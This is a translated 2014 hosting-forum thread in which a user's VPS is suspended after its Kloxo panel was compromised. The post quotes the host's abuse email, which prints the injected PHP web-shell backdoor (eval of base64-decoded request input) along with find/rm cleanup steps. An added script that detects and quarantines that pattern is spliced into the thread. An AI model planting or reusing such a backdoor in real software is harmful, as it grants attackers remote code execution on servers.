Global Hosting Forum (全球主机交流论坛)

Title: Help: my VPS was suspended, and they won't reactivate it...

Author: vielang    Time: 2014-2-8 09:44
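I went home for the New Year holiday, and photonvps suspended my VPS. Now they flatly refuse to reactivate it and I don't know what to do. The website data on the VPS was not backed up before the holiday, and I want them to reactivate it so I can make a backup. The conversation is below. What should I do now?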


photonvps
This is an easy fix. Give me the credentials and I'll fix it for you.




I now know that the VPS control panel has a loophole, but right now I cannot connect to repair it. I also want to back up the site data, and after the backup reinstall the VPS in the control panel. Can you help me open the VPS and let me do this operation?



photonvps
You are not reading the emails we sent you saying that your kloxo has an exploit that we needed you to clean? I am sorry, but if you ignore us we won't be able to help you with this type of abuse.
Your kloxo has an exploit you needed to clean, but you ignored us, so we suspended you to stop attacks from your VM. If you want us to help you, give us your server credentials; otherwise we are going to terminate this account.




Why stop my VPS




photonvps
Hello,

Your account has been suspended because you did not respond to the abuse ticket within 24 hours.

Thank you.

Hello,

This is the abuse department sending you an important email alert about a backdoor botnet exploit in your kloxo panel that needs fixing ASAP!

This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.

Fortunately this exploit can be fixed by following the instructions listed below.

Find files that were modified on the 27th of this month.

find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"

You should get something similar to this

/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php


The defuzx.php and emptzx.php files were uploaded, and are the exploit that needs deleting.

You can inspect the backdoor code that was injected by the hacker to gain access to your account.


<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

To remove the exploit we do

rm -fr /home/kloxo/httpd/default/emptzx.php

rm -fr /home/kloxo/httpd/default/defuzx.php

Make sure to only delete the files that were modified on the 27th. The default.php file changed due to kloxo being hacked, so to fix that we need to update kloxo and change the admin password.

Update kloxo: "/scripts/upcp"
Then finalize the fix by changing your kloxo admin panel password.
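
The triage steps in the abuse notice quoted in the post above (list recently modified PHP files, inspect them, take the uploaded ones out of the web root), as an added shell example that is not part of the original thread or the host's email. It flags files containing the same eval-of-request-input construct and, instead of `rm`, moves them to a quarantine directory with a hash record; the function names, the pattern and the quarantine layout are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. The pattern, output labels and
# quarantine layout are this example's own choices.

# eval() fed by base64-decoded request input: the shape of the quoted backdoor.
PATTERN='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(REQUEST|GET|POST|COOKIE)'
export PATTERN

# scan_webroot DIR [DAYS]: one line per PHP file modified in the last DAYS
# days (default 4), "SUSPECT <path>" if it matches PATTERN, else "RECENT <path>".
scan_webroot() {
    find "$1" -type f -iname '*.php' -mtime "-${2:-4}" -exec sh -c '
        for f; do
            if grep -Eq "$PATTERN" "$f"; then printf "SUSPECT %s\n" "$f"
            else printf "RECENT %s\n" "$f"; fi
        done' sh {} + | sort
}

# quarantine FILE DEST: record a hash, then move the file out of the web
# root and make it read-only, so it is kept for analysis rather than deleted.
quarantine() {
    mkdir -p "$2" && chmod 700 "$2"
    sha256sum "$1" >> "$2/manifest.sha256"
    mv -- "$1" "$2/$(basename "$1").quarantined"
    chmod 400 "$2/$(basename "$1").quarantined"
}

# make_sample: build a constructed web root so the example runs offline.
make_sample() {
    d=$(mktemp -d)
    echo '<?php echo "default page"; ?>' > "$d/default.php"
    echo '<?php eval(base64_decode($_REQUEST["placeholder"])); ?>' > "$d/defuzx.php"
    echo '<?php echo "untouched"; ?>' > "$d/old.php"
    touch -t 201401010000 "$d/old.php"   # mtime well outside the window
    echo "$d"
}

# Demo on the constructed tree; on the server DIR would be
# /home/kloxo/httpd/default, as in the notice.
sample=$(make_sample)
scan_webroot "$sample" 4
rm -rf "$sample"
```

A file reported as RECENT but not SUSPECT, like default.php in the notice, still needs manual review, since the pattern only covers this one backdoor shape.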

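Author: 分享吧    Time: 2014-2-8 09:48
It doesn't look like they said they won't reactivate it. They are asking you to fix the vulnerability?
Author: paopao00    Time: 2014-2-8 09:48
Had malware planted on the site?
Author: vielang    Time: 2014-2-8 09:50
分享吧 posted on 2014-2-8 09:48
It doesn't look like they said they won't reactivate it. They are asking you to fix the vulnerability?

The problem is that I can't connect, so I can't fix it.
Author: vielang    Time: 2014-2-8 09:52
paopao00 posted on 2014-2-8 09:48
Had malware planted on the site?

It seems to be a panel problem. KLOXO has a vulnerability and it wasn't patched in time.
Author: 分享吧    Time: 2014-2-8 09:59
vielang posted on 2014-2-8 09:50
The problem is that I can't connect, so I can't fix it.

OK, I'm out of ideas...
Author: kwx    Time: 2014-2-8 11:20
Kloxo installs have all been getting wrecked lately.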



